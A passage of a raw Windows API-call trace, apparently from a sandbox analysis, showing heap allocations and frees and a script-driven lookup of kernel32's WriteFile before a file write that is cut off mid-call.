hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.673] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0184.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0184.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.676] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd9d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.682] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.683] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x77bb, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: 